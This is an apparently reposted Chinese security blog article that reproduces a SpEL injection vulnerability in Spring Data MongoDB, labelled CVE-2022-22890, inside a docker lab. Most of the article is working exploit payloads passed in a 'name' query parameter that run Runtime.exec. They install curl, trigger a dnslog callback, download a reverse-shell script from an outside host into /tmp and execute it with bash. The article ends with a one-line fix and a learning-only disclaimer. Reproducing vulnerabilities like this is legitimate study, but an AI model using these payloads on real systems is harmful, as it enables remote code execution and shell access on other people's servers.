CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现

admin 2022年12月28日19:16:51评论122 views字数 1106阅读3分41秒阅读模式

CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现


PART.01
漏洞概述

Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符。


PART.02
影响范围

v3.4.0

v3.3.0 to v3.3.4


PART.03
漏洞环境
docker pull vulfocus/spring-data-mongo-cve_2022_22890:latestdocker run -d -p 8080:8080 vulfocus/spring-data-mongo-cve_2022_22890:latest

PART.04
漏洞复现

在环境中安装curl,一般等圈圈转好就认为命令执行完成

?name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27apt-get update%27)
CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现
name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27apt-get install -y curl%27)
CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现

使用dnslog进行测试

name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27curl 88n0s9.dnslog.cn%27)
CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现

在云服务上部署反弹shell的脚本,下载该脚本 

name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27curl%20-o%20%2Ftmp%2F1.sh%20http%3A%2F%2Fip%3A8000%2F1.sh%27)
CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现

使用bash命令执行

name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27bash%20/tmp/1.sh%27)
CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现

反弹成功

CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现

PART.05
漏洞修复

升级到最新版本



长风实验室发布、转载的文章中所涉及的技术、思路和工具,仅供以网络安全为目的的学习交流使用,不得用作它途。部分文章来源于网络,如有侵权请联系删除。

END

 推荐 

 阅读 

CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现
CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现


点赞在看

扫码关注|更多好玩

 长风实验室 · 

CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现

原文始发于微信公众号(长风实验室):CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月28日19:16:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现https://cn-sec.com/archives/1484707.html

发表评论

匿名网友 填写信息